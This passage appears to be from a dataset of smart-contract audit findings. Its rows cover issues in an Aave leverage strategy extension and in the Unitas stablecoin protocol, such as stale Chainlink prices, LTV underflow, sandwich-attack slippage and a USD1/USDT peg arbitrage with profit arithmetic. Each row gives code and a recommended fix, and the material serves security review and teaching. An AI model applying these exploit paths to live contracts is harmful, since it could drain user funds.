noRebalanceInProgress {\\n incentive = _newIncentiveSettings;\\n\\n _validateNonExchangeSettings(methodology, execution, incentive);\\n\\n emit IncentiveSettingsUpdated(\\n incentive.etherReward,\\n incentive.incentivizedLeverageRatio,\\n incentive.incentivizedSlippageTolerance,\\n incentive.incentivizedTwapCooldownPeriod\\n );\\n }\\n```\\n","Add some checks on whether the supply cap of an Aave market is reached during a rebalance. If so, allows a re-set of twapLeverageRatio",setIncentiveSettings would be halt.,"```\\n function setIncentiveSettings(IncentiveSettings memory _newIncentiveSettings) external onlyOperator noRebalanceInProgress {\\n incentive = _newIncentiveSettings;\\n\\n _validateNonExchangeSettings(methodology, execution, incentive);\\n\\n emit IncentiveSettingsUpdated(\\n incentive.etherReward,\\n incentive.incentivizedLeverageRatio,\\n incentive.incentivizedSlippageTolerance,\\n incentive.incentivizedTwapCooldownPeriod\\n );\\n }\\n```\\n" +Protocol doesn't completely protect itself from `LTV = 0` tokens,medium,"The AaveLeverageStrategyExtension does not completely protect against tokens with a Loan-to-Value (LTV) of 0. Tokens with an LTV of 0 in Aave V3 pose significant risks, as they cannot be used as collateral to borrow upon a breaking withdraw. Moreover, LTVs of assets could be set to 0, even though they currently aren't, it could create substantial problems with potential disruption of multiple functionalities. This bug could cause a Denial-of-Service (DoS) situation in some cases, and has a potential to impact the borrowing logic in the protocol, leading to an unintentionally large perceived borrowing limit.\\nWhen an AToken has LTV = 0, Aave restricts the usage of certain operations. Specifically, if a user owns at least one AToken as collateral with an LTV = 0, certain operations could revert:\\nWithdraw: If the asset being withdrawn is collateral and the user is borrowing something, the operation will revert if the withdrawn collateral is an AToken with LTV > 0.\\nTransfer: If the asset being transferred is an AToken with LTV > 0 and the sender is using the asset as collateral and is borrowing something, the operation will revert.\\nSet the reserve of an AToken as non-collateral: If the AToken being set as non-collateral is an AToken with LTV > 0, the operation will revert.\\nTake a look at AaveLeverageStrategyExtension.sol#L1050-L1119\\n```\\n /**\\n * Calculate total notional rebalance quantity and chunked rebalance quantity in collateral units.\\n *\\n * return uint256 Chunked rebalance notional in collateral units\\n * return uint256 Total rebalance notional in collateral units\\n */\\n function _calculateChunkRebalanceNotional(\\n LeverageInfo memory _leverageInfo,\\n uint256 _newLeverageRatio,\\n bool _isLever\\n )\\n internal\\n view\\n returns (uint256, uint256)\\n {\\n // Calculate absolute value of difference between new and current leverage ratio\\n uint256 leverageRatioDifference = _isLever ? _newLeverageRatio.sub(_leverageInfo.currentLeverageRatio) : _leverageInfo.currentLeverageRatio.sub(_newLeverageRatio);\\n\\n uint256 totalRebalanceNotional = leverageRatioDifference.preciseDiv(_leverageInfo.currentLeverageRatio).preciseMul(_leverageInfo.action.collateralBalance);\\n\\n uint256 maxBorrow = _calculateMaxBorrowCollateral(_leverageInfo.action, _isLever);\\n\\n uint256 chunkRebalanceNotional = Math.min(Math.min(maxBorrow, totalRebalanceNotional), _leverageInfo.twapMaxTradeSize);\\n\\n return (chunkRebalanceNotional, totalRebalanceNotional);\\n }\\n\\n /**\\n * Calculate the max borrow / repay amount allowed in base units for lever / delever. This is due to overcollateralization requirements on\\n * assets deposited in lending protocols for borrowing.\\n *\\n * For lever, max borrow is calculated as:\\n * (Net borrow limit in USD - existing borrow value in USD) / collateral asset price adjusted for decimals\\n *\\n * For delever, max repay is calculated as:\\n * Collateral balance in base units * (net borrow limit in USD - existing borrow value in USD) / net borrow limit in USD\\n *\\n * Net borrow limit for levering is calculated as:\\n * The collateral value in USD * Aave collateral factor * (1 - unutilized leverage %)\\n *\\n * Net repay limit for delevering is calculated as:\\n * The collateral value in USD * Aave liquiditon threshold * (1 - unutilized leverage %)\\n *\\n * return uint256 Max borrow notional denominated in collateral asset\\n */\\n function _calculateMaxBorrowCollateral(ActionInfo memory _actionInfo, bool _isLever) internal view returns(uint256) {\\n\\n // Retrieve collateral factor and liquidation threshold for the collateral asset in precise units (1e16 = 1%)\\n ( , uint256 maxLtvRaw, uint256 liquidationThresholdRaw, , , , , , ,) = strategy.aaveProtocolDataProvider.getReserveConfigurationData(address(strategy.collateralAsset));\\n\\n // Normalize LTV and liquidation threshold to precise units. LTV is measured in 4 decimals in Aave which is why we must multiply by 1e14\\n // for example ETH has an LTV value of 8000 which represents 80%\\n if (_isLever) {\\n uint256 netBorrowLimit = _actionInfo.collateralValue\\n .preciseMul(maxLtvRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return netBorrowLimit\\n .sub(_actionInfo.borrowValue)\\n .preciseDiv(_actionInfo.collateralPrice);\\n } else {\\n uint256 netRepayLimit = _actionInfo.collateralValue\\n .preciseMul(liquidationThresholdRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return _actionInfo.collateralBalance\\n .preciseMul(netRepayLimit.sub(_actionInfo.borrowValue))\\n .preciseDiv(netRepayLimit);\\n }\\n }\\n```\\n\\nApart from the aforementioned issue with `LTV = 0` tokens, there's another issue with the `_calculateMaxBorrowCollateral()` function. When `LTV = 0`, `maxLtvRaw` also equals 0, leading to a `netBorrowLimit` of 0. When the borrowing value is subtracted from this, it results in an underflow, causing the borrowing limit to appear incredibly large. This essentially breaks the borrowing logic of the protocol.",The protocol should consider implementing additional protections against tokens with an LTV of 0.,"This bug could potentially disrupt the entire borrowing logic within the protocol by inflating the perceived borrowing limit. This could lead to users borrowing an unlimited amount of assets due to the underflow error. In extreme cases, this could lead to a potential loss of user funds or even a complete protocol shutdown, thus impacting user trust and the overall functionality of the protocol.","```\\n /**\\n * Calculate total notional rebalance quantity and chunked rebalance quantity in collateral units.\\n *\\n * return uint256 Chunked rebalance notional in collateral units\\n * return uint256 Total rebalance notional in collateral units\\n */\\n function _calculateChunkRebalanceNotional(\\n LeverageInfo memory _leverageInfo,\\n uint256 _newLeverageRatio,\\n bool _isLever\\n )\\n internal\\n view\\n returns (uint256, uint256)\\n {\\n // Calculate absolute value of difference between new and current leverage ratio\\n uint256 leverageRatioDifference = _isLever ? _newLeverageRatio.sub(_leverageInfo.currentLeverageRatio) : _leverageInfo.currentLeverageRatio.sub(_newLeverageRatio);\\n\\n uint256 totalRebalanceNotional = leverageRatioDifference.preciseDiv(_leverageInfo.currentLeverageRatio).preciseMul(_leverageInfo.action.collateralBalance);\\n\\n uint256 maxBorrow = _calculateMaxBorrowCollateral(_leverageInfo.action, _isLever);\\n\\n uint256 chunkRebalanceNotional = Math.min(Math.min(maxBorrow, totalRebalanceNotional), _leverageInfo.twapMaxTradeSize);\\n\\n return (chunkRebalanceNotional, totalRebalanceNotional);\\n }\\n\\n /**\\n * Calculate the max borrow / repay amount allowed in base units for lever / delever. This is due to overcollateralization requirements on\\n * assets deposited in lending protocols for borrowing.\\n *\\n * For lever, max borrow is calculated as:\\n * (Net borrow limit in USD - existing borrow value in USD) / collateral asset price adjusted for decimals\\n *\\n * For delever, max repay is calculated as:\\n * Collateral balance in base units * (net borrow limit in USD - existing borrow value in USD) / net borrow limit in USD\\n *\\n * Net borrow limit for levering is calculated as:\\n * The collateral value in USD * Aave collateral factor * (1 - unutilized leverage %)\\n *\\n * Net repay limit for delevering is calculated as:\\n * The collateral value in USD * Aave liquiditon threshold * (1 - unutilized leverage %)\\n *\\n * return uint256 Max borrow notional denominated in collateral asset\\n */\\n function _calculateMaxBorrowCollateral(ActionInfo memory _actionInfo, bool _isLever) internal view returns(uint256) {\\n\\n // Retrieve collateral factor and liquidation threshold for the collateral asset in precise units (1e16 = 1%)\\n ( , uint256 maxLtvRaw, uint256 liquidationThresholdRaw, , , , , , ,) = strategy.aaveProtocolDataProvider.getReserveConfigurationData(address(strategy.collateralAsset));\\n\\n // Normalize LTV and liquidation threshold to precise units. LTV is measured in 4 decimals in Aave which is why we must multiply by 1e14\\n // for example ETH has an LTV value of 8000 which represents 80%\\n if (_isLever) {\\n uint256 netBorrowLimit = _actionInfo.collateralValue\\n .preciseMul(maxLtvRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return netBorrowLimit\\n .sub(_actionInfo.borrowValue)\\n .preciseDiv(_actionInfo.collateralPrice);\\n } else {\\n uint256 netRepayLimit = _actionInfo.collateralValue\\n .preciseMul(liquidationThresholdRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return _actionInfo.collateralBalance\\n .preciseMul(netRepayLimit.sub(_actionInfo.borrowValue))\\n .preciseDiv(netRepayLimit);\\n }\\n }\\n```\\n" +no validation to ensure the arbitrum sequencer is down,medium,There is no validation to ensure sequencer is down\\n```\\n int256 rawCollateralPrice = strategy.collateralPriceOracle.latestAnswer();\\n rebalanceInfo.collateralPrice = rawCollateralPrice.toUint256().mul(10 ** strategy.collateralDecimalAdjustment);\\n int256 rawBorrowPrice = strategy.borrowPriceOracle.latestAnswer();\\n rebalanceInfo.borrowPrice = rawBorrowPrice.toUint256().mul(10 ** strategy.borrowDecimalAdjustment);\\n```\\n\\nUsing Chainlink in L2 chains such as Arbitrum requires to check if the sequencer is down to avoid prices from looking like they are fresh although they are not.\\nThe bug could be leveraged by malicious actors to take advantage of the sequencer downtime.,recommend to add checks to ensure the sequencer is not down.,"when sequencer is down, stale price is used for oracle and the borrow value and collateral value is calculated and the protocol can be forced to rebalance in a loss position",```\\n int256 rawCollateralPrice = strategy.collateralPriceOracle.latestAnswer();\\n rebalanceInfo.collateralPrice = rawCollateralPrice.toUint256().mul(10 ** strategy.collateralDecimalAdjustment);\\n int256 rawBorrowPrice = strategy.borrowPriceOracle.latestAnswer();\\n rebalanceInfo.borrowPrice = rawBorrowPrice.toUint256().mul(10 ** strategy.borrowDecimalAdjustment);\\n```\\n +Relying solely on oracle base slippage parameters can cause significant loss due to sandwich attacks,medium,"AaveLeverageStrategyExtension relies solely on oracle price data when determining the slippage parameter during a rebalance. This is problematic as chainlink oracles, especially mainnet, have upwards of 2% threshold before triggering a price update. If swapping between volatile assets, the errors will compound causing even bigger variation. These variations can be exploited via sandwich attacks.\\nAaveLeverageStrategyExtension.sol#L1147-L1152\\n```\\nfunction _calculateMinRepayUnits(uint256 _collateralRebalanceUnits, uint256 _slippageTolerance, ActionInfo memory _actionInfo) internal pure returns (uint256) {\\n return _collateralRebalanceUnits\\n .preciseMul(_actionInfo.collateralPrice)\\n .preciseDiv(_actionInfo.borrowPrice)\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(_slippageTolerance));\\n}\\n```\\n\\nWhen determining the minimum return from the swap, _calculateMinRepayUnits directly uses oracle data to determine the final output. The differences between the true value and the oracle value can be systematically exploited via sandwich attacks. Given the leverage nature of the module, these losses can cause significant loss to the pool.","The solution to this is straight forward. Allow keepers to specify their own slippage value. Instead of using an oracle slippage parameter, validate that the specified slippage value is within a margin of the oracle. This gives the best of both world. It allows for tighter and more reactive slippage controls while still preventing outright abuse in the event that the trusted keeper is compromised.",Purely oracle derived slippage parameters will lead to significant and unnecessary losses,"```\\nfunction _calculateMinRepayUnits(uint256 _collateralRebalanceUnits, uint256 _slippageTolerance, ActionInfo memory _actionInfo) internal pure returns (uint256) {\\n return _collateralRebalanceUnits\\n .preciseMul(_actionInfo.collateralPrice)\\n .preciseDiv(_actionInfo.borrowPrice)\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(_slippageTolerance));\\n}\\n```\\n" +"Chainlink price feed is `deprecated`, not sufficiently validated and can return `stale` prices.",medium,"The function `_createActionInfo()` uses Chainlink's deprecated latestAnswer function, this function also does not guarantee that the price returned by the Chainlink price feed is not stale and there is no additional checks to ensure that the return values are valid.\\nThe internal function `_createActionInfo()` uses calls `strategy.collateralPriceOracle.latestAnswer()` and `strategy.borrowPriceOracle.latestAnswer()` that uses Chainlink's deprecated latestAnswer() to get the latest price. However, there is no check for if the return value is a stale data.\\n```\\nfunction _createActionInfo() internal view returns(ActionInfo memory) {\\n ActionInfo memory rebalanceInfo;\\n\\n // Calculate prices from chainlink. Chainlink returns prices with 8 decimal places, but we need 36 - underlyingDecimals decimal places.\\n // This is so that when the underlying amount is multiplied by the received price, the collateral valuation is normalized to 36 decimals.\\n // To perform this adjustment, we multiply by 10^(36 - 8 - underlyingDecimals)\\n int256 rawCollateralPrice = strategy.collateralPriceOracle.latestAnswer();\\n rebalanceInfo.collateralPrice = rawCollateralPrice.toUint256().mul(10 ** strategy.collateralDecimalAdjustment);\\n int256 rawBorrowPrice = strategy.borrowPriceOracle.latestAnswer();\\n rebalanceInfo.borrowPrice = rawBorrowPrice.toUint256().mul(10 ** strategy.borrowDecimalAdjustment);\\n// More Code// rest of code.\\n}\\n \\n```\\n","The `latestRoundData` function should be used instead of the deprecated `latestAnswer` function and add sufficient checks to ensure that the pricefeed is not stale.\\n```\\n(uint80 roundId, int256 assetChainlinkPriceInt, , uint256 updatedAt, uint80 answeredInRound) = IPrice(_chainlinkFeed).latestRoundData();\\n require(answeredInRound >= roundId, ""price is stale"");\\n require(updatedAt > 0, ""round is incomplete"");\\n```\\n","The function `_createActionInfo()` is used to return important values used throughout the contract, the staleness of the chainlinklink return values will lead to wrong calculation of the collateral and borrow prices and other unexpected behavior.","```\\nfunction _createActionInfo() internal view returns(ActionInfo memory) {\\n ActionInfo memory rebalanceInfo;\\n\\n // Calculate prices from chainlink. Chainlink returns prices with 8 decimal places, but we need 36 - underlyingDecimals decimal places.\\n // This is so that when the underlying amount is multiplied by the received price, the collateral valuation is normalized to 36 decimals.\\n // To perform this adjustment, we multiply by 10^(36 - 8 - underlyingDecimals)\\n int256 rawCollateralPrice = strategy.collateralPriceOracle.latestAnswer();\\n rebalanceInfo.collateralPrice = rawCollateralPrice.toUint256().mul(10 ** strategy.collateralDecimalAdjustment);\\n int256 rawBorrowPrice = strategy.borrowPriceOracle.latestAnswer();\\n rebalanceInfo.borrowPrice = rawBorrowPrice.toUint256().mul(10 ** strategy.borrowDecimalAdjustment);\\n// More Code// rest of code.\\n}\\n \\n```\\n" +The protocol does not compatible with token such as USDT because of the Approval Face Protection,medium,"The protocol does not compatible with token such as USDT because of the Approval Face Protection\\nthe protocol is intended to interact with any ERC20 token and USDT is a common one\\nQ: Which ERC20 tokens do you expect will interact with the smart contracts? The protocol expects to interact with any ERC20.\\nIndividual SetToken's should only interact with ERC20 chosen by the SetToken manager.\\nwhen doing the deleverage\\nfirst, we construct the deleverInfo\\n```\\nActionInfo memory deleverInfo = _createAndValidateActionInfo(\\n _setToken,\\n _collateralAsset,\\n _repayAsset,\\n _redeemQuantityUnits,\\n _minRepayQuantityUnits,\\n _tradeAdapterName,\\n false\\n );\\n```\\n\\nthen we withdraw from the lending pool, execute trade and repay the borrow token\\n```\\n_withdraw(deleverInfo.setToken, deleverInfo.lendingPool, _collateralAsset, deleverInfo.notionalSendQuantity);\\n\\n uint256 postTradeReceiveQuantity = _executeTrade(deleverInfo, _collateralAsset, _repayAsset, _tradeData);\\n\\n uint256 protocolFee = _accrueProtocolFee(_setToken, _repayAsset, postTradeReceiveQuantity);\\n\\n uint256 repayQuantity = postTradeReceiveQuantity.sub(protocolFee);\\n\\n _repayBorrow(deleverInfo.setToken, deleverInfo.lendingPool, _repayAsset, repayQuantity);\\n```\\n\\nthis is calling _repayBorrow\\n```\\n/**\\n * @dev Invoke repay from SetToken using AaveV2 library. Burns DebtTokens for SetToken.\\n */\\nfunction _repayBorrow(ISetToken _setToken, ILendingPool _lendingPool, IERC20 _asset, uint256 _notionalQuantity) internal {\\n _setToken.invokeApprove(address(_asset), address(_lendingPool), _notionalQuantity);\\n _setToken.invokeRepay(_lendingPool, address(_asset), _notionalQuantity, BORROW_RATE_MODE);\\n}\\n```\\n\\nthe trade received (quantity - the protocol fee) is used to repay the debt\\nbut the required debt to be required is the (borrowed amount + the interest rate)\\nsuppose the only debt that needs to be repayed is 1000 USDT\\ntrade received (quantity - the protocol) fee is 20000 USDT\\nonly 1000 USDT is used to repay the debt\\nbecause when repaying, the paybackAmount is only the debt amount\\n```\\nuint256 paybackAmount = params.interestRateMode == DataTypes.InterestRateMode.STABLE\\n ? stableDebt\\n : variableDebt;\\n```\\n\\nthen when burning the variable debt token\\n```\\nreserveCache.nextScaledVariableDebt = IVariableDebtToken(\\n reserveCache.variableDebtTokenAddress\\n ).burn(params.onBehalfOf, paybackAmount, reserveCache.nextVariableBorrowIndex);\\n```\\n\\nonly the ""payback amount"", which is 1000 USDT is transferred to pay the debt,\\nthe excessive leftover amount is (20000 USDT - 1000 USDT) = 19000 USDT\\nbut if we lookback into the repayBack function\\n```\\n/**\\n * @dev Invoke repay from SetToken using AaveV2 library. Burns DebtTokens for SetToken.\\n */\\nfunction _repayBorrow(ISetToken _setToken, ILendingPool _lendingPool, IERC20 _asset, uint256 _notionalQuantity) internal {\\n _setToken.invokeApprove(address(_asset), address(_lendingPool), _notionalQuantity);\\n _setToken.invokeRepay(_lendingPool, address(_asset), _notionalQuantity, BORROW_RATE_MODE);\\n}\\n```\\n\\nthe approved amount is 20000 USDT, but only 1000 USDT approval limit is used, we have 19000 USDT approval limit left\\naccording to\\nSome tokens (e.g. OpenZeppelin) will revert if trying to approve the zero address to spend tokens (i.e. a call to approve(address(0), amt)).\\nIntegrators may need to add special cases to handle this logic if working with such a token.\\nUSDT is such token that subject to approval race condition, without approving 0 first, the second approve after first repay will revert",Approval 0 first,second and following repay borrow will revert if the ERC20 token is subject to approval race condition,"```\\nActionInfo memory deleverInfo = _createAndValidateActionInfo(\\n _setToken,\\n _collateralAsset,\\n _repayAsset,\\n _redeemQuantityUnits,\\n _minRepayQuantityUnits,\\n _tradeAdapterName,\\n false\\n );\\n```\\n" +Operator is blocked when sequencer is down on Arbitrum,medium,When the sequencer is down on Arbitrum state changes can still happen on L2 by passing them from L1 through the Delayed Inbox.\\nUsers can still interact with the Index protocol but due to how Arbitrum address aliasing functions the operator will be blocked from calling onlyOperator().\\nThe `msg.sender` of a transaction from the Delayed Inbox is aliased:\\n```\\nL2_Alias = L1_Contract_Address + 0x1111000000000000000000000000000000001111\\n```\\n\\nAll functions with the `onlyOperator()` modifier are therefore blocked when the sequencer is down.\\nThe issue exists for all modifiers that are only callable by specific EOAs. But the operator of the Aave3LeverageStrategyExtension is the main security risk.,Change the `onlyOperator()` to check if the address is the aliased address of the operator.,The operator has roles that are vital for the safety of the protocol. Re-balancing and issuing/redeeming can still be done when the sequencer is down it is therefore important that the operator call the necessary functions to operate the protocol when the sequencer is down.\\n`disengage()` is an important safety function that the operator should always have access especially when the protocol is still in accessible to other users. Changing methodology and adding/removing exchanges are also important for the safety of the protocol.,```\\nL2_Alias = L1_Contract_Address + 0x1111000000000000000000000000000000001111\\n```\\n +Oracle Price miss matched when E-mode uses single oracle,medium,"AAVE3 can turn on single oracle use on any E-mode category. When that is done collateral and the borrowed assets will be valued based on a single oracle price. When this is done the prices used in AaveLeverageStrategyExtension can differ from those used internally in AAVE3.\\nThis can lead to an increased risk of liquidation and failures to re-balance properly.\\nThere is currently no accounting for single oracle use in the AaveLeverageStragyExtension, if AAVE3 turns it on the extension will simply continue using its current oracles without accounting for the different prices.\\nWhen re-balancing the following code calculate the netBorrowLimit/netRepayLimit:\\n```\\n if (_isLever) {\\n uint256 netBorrowLimit = _actionInfo.collateralValue\\n .preciseMul(maxLtvRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return netBorrowLimit\\n .sub(_actionInfo.borrowValue)\\n .preciseDiv(_actionInfo.collateralPrice);\\n } else {\\n uint256 netRepayLimit = _actionInfo.collateralValue\\n .preciseMul(liquidationThresholdRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return _actionInfo.collateralBalance\\n .preciseMul(netRepayLimit.sub(_actionInfo.borrowValue)) \\n .preciseDiv(netRepayLimit);\\n \\n```\\n\\nThe `_actionInfo.collateralValue` and `_adminInfo.borrowValue` are `_getAndValidateLeverageInfo()` where they are both retrieved based on the current set chainlink oracle.\\nWhen E-mode uses a single oracle price a de-pegging of one of the assets will lead to incorrect values of `netBorrowLimit` and `netRepayLimit` depending on which asset is de-pegging.\\n`collateralValue` or `borrowValue` can be either larger or smaller than how they are valued internally in AAVE3.",Aave3LeverageStrategyExtension should take single oracle usage into account. `_calcualteMaxBorrowCollateral` should check if there is a discrepancy and adjust such that the `execute.unutilizedLeveragePercentage` safety parameter is honored.,"When Levering\\nIf `collateralValue` is to valued higher than internally in AAVE3 OR If `borrowValue` is to valued lower than internally in AAVE3:\\nThe `netBorrowLimit` is larger than it should be we are essentially going to overriding `execute.unutilizedLeveragePercentage` and attempting to borrow more than we should.\\nIf `collateralValue` is valued lower than internally in AAVE3 OR If `borrowValue` is to valued higher than internally in AAVE3:\\nThe `netBorrowLimit` is smaller than it should be, we are not borrowing as much as we should. Levering up takes longer.\\nWhen Delevering\\nIf `collateralValue` is to valued higher than internally in AAVE3 OR If `borrowValue` is to valued lower than internally in AAVE3:\\nWe will withdraw more collateral and repay more than specified by `execution.unutilizedLeveragePercentage`.\\nIf `collateralValue` is valued lower than internally in AAVE3 OR If `borrowValue` is to valued higher than internally in AAVE3:\\nWe withdraw less and repay less debt than we should. This means that both `ripcord()` and `disengage()` are not functioning as they, they will not delever as fast they should. We can look at it as `execution.unutilizedLeveragePercentage` not being throttled.\\nThe above consequences show that important functionality is not working as expected. ""overriding"" `execution.unutilizedLeveragePercentage` is a serious safety concern.",```\\n if (_isLever) {\\n uint256 netBorrowLimit = _actionInfo.collateralValue\\n .preciseMul(maxLtvRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return netBorrowLimit\\n .sub(_actionInfo.borrowValue)\\n .preciseDiv(_actionInfo.collateralPrice);\\n } else {\\n uint256 netRepayLimit = _actionInfo.collateralValue\\n .preciseMul(liquidationThresholdRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return _actionInfo.collateralBalance\\n .preciseMul(netRepayLimit.sub(_actionInfo.borrowValue)) \\n .preciseDiv(netRepayLimit);\\n \\n```\\n +"In case the portfolio makes a loss, the total reserves and reserve ratio will be inflated.",medium,"The pool balance is transferred to the portfolio for investment, for example sending USDT to Curve/Aave/Balancer etc. to generate yield. However, there are risks associated with those protocols such as smart contract risks. In case a loss happens, it will not be reflected in the pool balance and the total reserve and reserve ratio will be inflated.\\nThe assets in the pool can be sent to the portfolio account to invest and earn yield. The amount of assets in the insurance pool and Unitas pool is tracked by the `_balance` variable. This amount is used to calculate the total reserve and total collateral, which then are used to calculate the reserve ratio.\\n```\\n uint256 tokenReserve = _getBalance(token);\\n uint256 tokenCollateral = IInsurancePool(insurancePool).getCollateral(token);\\n```\\n\\nWhen there is a loss to the portfolio, there is no way to write down the `_balance` variable. This leads to an overstatement of the total reserve and reserve ratio.","Add function to allow admin to write off the `_balance` in case of investment lost. Example:\\n```\\nfunction writeOff(address token, uint256 amount) external onlyGuardian {\\n\\n uint256 currentBalance = IERC20(token).balanceOf(address(this));\\n\\n // Require that the amount to write off is less than or equal to the current balance\\n require(amount <= currentBalance, ""Amount exceeds balance"");\\n _balance[token] -= amount;\\n\\n emit WriteOff(token, amount);\\n}\\n```\\n",Overstatement of the total reserve and reserve ratio can increase the risk for the protocol because of undercollateralization of assets.,```\\n uint256 tokenReserve = _getBalance(token);\\n uint256 tokenCollateral = IInsurancePool(insurancePool).getCollateral(token);\\n```\\n +USD1 is priced as $1 instead of being pegged to USDT,medium,"The system treats 1 USD1 = $1 instead of 1 USD1 = 1 USDT which allows arbitrage opportunities.\\nTo swap from one token to another Unitas first get's the price of the quote token and then calculates the swap result. Given that we want to swap 1 USD1 for USDT, we have USDT as the quote token:\\n```\\n address priceQuoteToken = _getPriceQuoteToken(tokenIn, tokenOut);\\n price = oracle.getLatestPrice(priceQuoteToken);\\n _checkPrice(priceQuoteToken, price);\\n\\n feeNumerator = isBuy ? pair.buyFee : pair.sellFee;\\n feeToken = IERC20Token(priceQuoteToken == tokenIn ? tokenOut : tokenIn);\\n\\n SwapRequest memory request;\\n request.tokenIn = tokenIn;\\n request.tokenOut = tokenOut;\\n request.amountType = amountType;\\n request.amount = amount;\\n request.feeNumerator = feeNumerator;\\n request.feeBase = tokenManager.SWAP_FEE_BASE();\\n request.feeToken = address(feeToken);\\n request.price = price;\\n request.priceBase = 10 ** oracle.decimals();\\n request.quoteToken = priceQuoteToken;\\n\\n (amountIn, amountOut, fee) = _calculateSwapResult(request);\\n```\\n\\nSince `amountType == AmountType.In`, it executes _calculateSwapResultByAmountIn():\\n```\\n // When tokenOut is feeToken, subtracts the fee after converting the amount\\n amountOut = _convert(\\n request.tokenIn,\\n request.tokenOut,\\n amountIn,\\n MathUpgradeable.Rounding.Down,\\n request.price,\\n request.priceBase,\\n request.quoteToken\\n );\\n fee = _getFeeByAmountWithFee(amountOut, request.feeNumerator, request.feeBase);\\n amountOut -= fee;\\n```\\n\\nGiven that the price is 0.99e18, i.e. 1 USDT is worth $0.99, it calculates the amount of USDT we should receive as:\\n```\\n function _convertByFromPrice(\\n address fromToken,\\n address toToken,\\n uint256 fromAmount,\\n MathUpgradeable.Rounding rounding,\\n uint256 price,\\n uint256 priceBase\\n ) internal view virtual returns (uint256) {\\n uint256 fromBase = 10 ** IERC20Metadata(fromToken).decimals();\\n uint256 toBase = 10 ** IERC20Metadata(toToken).decimals();\\n\\n return fromAmount.mulDiv(price * toBase, priceBase * fromBase, rounding);\\n }\\n```\\n\\nGiven that:\\ntoBase = 10**6 = 1e6 (USDT has 6 decimals)\\nfromBase = 10**18 = 1e18 (USD1 has 18 decimals)\\npriceBase = 1e18\\nprice = 0.99e18 (1 USDT = $0.99)\\nfromAmount = 1e18 (we swap 1 USD1) we get: $1e18 * 0.99e18 * 1e6 / (1e18 * 1e18) = 0.99e6$\\nSo by redeeming 1 USD1 I only get back 0.99 USDT. The other way around, trading USDT for USD1, would get you 1.01 USD1 for 1 USDT: $1e6 * 1e18 * 1e18 / (0.99e18 * 1e6) = 1.01e18$\\nThe contract values USD1 at exactly $1 while USDT's price is variable. But, in reality, USD1 is not pegged to $1. It's pegged to USDT the only underlying asset.\\nThat allows us to do the following:\\nWith USDT back to $1 we get: $1.003009e+23 * 1e18 * 1e6 / (1e18 * 1e18) = 100300.9e6$\\nThat's a profit of 300 USDT. The profit is taken from other users of the protocol who deposited USDT to get access to the other stablecoins.",1 USDT should always be 1 USD1. You treat 1 USD1 as $1 but that's not the case.,An attacker can abuse the price variation of USDT to buy USD1 for cheap.,"```\\n address priceQuoteToken = _getPriceQuoteToken(tokenIn, tokenOut);\\n price = oracle.getLatestPrice(priceQuoteToken);\\n _checkPrice(priceQuoteToken, price);\\n\\n feeNumerator = isBuy ? pair.buyFee : pair.sellFee;\\n feeToken = IERC20Token(priceQuoteToken == tokenIn ? tokenOut : tokenIn);\\n\\n SwapRequest memory request;\\n request.tokenIn = tokenIn;\\n request.tokenOut = tokenOut;\\n request.amountType = amountType;\\n request.amount = amount;\\n request.feeNumerator = feeNumerator;\\n request.feeBase = tokenManager.SWAP_FEE_BASE();\\n request.feeToken = address(feeToken);\\n request.price = price;\\n request.priceBase = 10 ** oracle.decimals();\\n request.quoteToken = priceQuoteToken;\\n\\n (amountIn, amountOut, fee) = _calculateSwapResult(request);\\n```\\n" +Users may not be able to fully redeem USD1 into USDT even when reserve ratio is above 100%,medium,"Users may not be able to fully redeem USDT even when reserve ratio is above 100%, because of portfolio being taken into the account for calculation.\\nReserve ratio shows how many liabilities is covered by reserves, a reserve ratio above 100% guarantees protocol has enough USDT to redeem, the way of calculating reserve ratio is `Reserve Ratio = allReserves / liabilities` and is implemented in Unitas#_getReserveStatus(...) function:\\n```\\n reserveRatio = ScalingUtils.scaleByBases(\\n allReserves * valueBase / liabilities,\\n valueBase,\\n tokenManager.RESERVE_RATIO_BASE()\\n );\\n```\\n\\n`allReserves` is the sum of the balance of Unitas and InsurancePool, calculated in Unitas#_getTotalReservesAndCollaterals() function:\\n```\\n for (uint256 i; i < tokenCount; i++) {\\n address token = tokenManager.tokenByIndex(tokenTypeValue, i);\\n uint256 tokenReserve = _getBalance(token);\\n uint256 tokenCollateral = IInsurancePool(insurancePool).getCollateral(token);\\n\\n\\n if (tokenReserve > 0 || tokenCollateral > 0) {\\n uint256 price = oracle.getLatestPrice(token);\\n\\n\\n reserves += _convert(\\n token,\\n baseToken,\\n tokenReserve,\\n MathUpgradeable.Rounding.Down,\\n price,\\n priceBase,\\n token\\n );\\n\\n\\n collaterals += _convert(\\n token,\\n baseToken,\\n tokenCollateral,\\n MathUpgradeable.Rounding.Down,\\n price,\\n priceBase,\\n token\\n );\\n }\\n }\\n```\\n\\n`liabilities` is the total value of USD1 and USDEMC tokens, calculated in Unitas#_getTotalLiabilities() function:\\n```\\n for (uint256 i; i < tokenCount; i++) {\\n address token = tokenManager.tokenByIndex(tokenTypeValue, i);\\n uint256 tokenSupply = IERC20Token(token).totalSupply();\\n\\n\\n if (token == baseToken) {\\n // Adds up directly when the token is USD1\\n liabilities += tokenSupply;\\n } else if (tokenSupply > 0) {\\n uint256 price = oracle.getLatestPrice(token);\\n\\n\\n liabilities += _convert(\\n token,\\n baseToken,\\n tokenSupply,\\n MathUpgradeable.Rounding.Down,\\n price,\\n priceBase,\\n token\\n );\\n }\\n }\\n```\\n\\nSome amount of USDT in both Unitas and InsurancePool is `portfolio`, which represents the current amount of assets used for strategic investments, it is worth noting that after 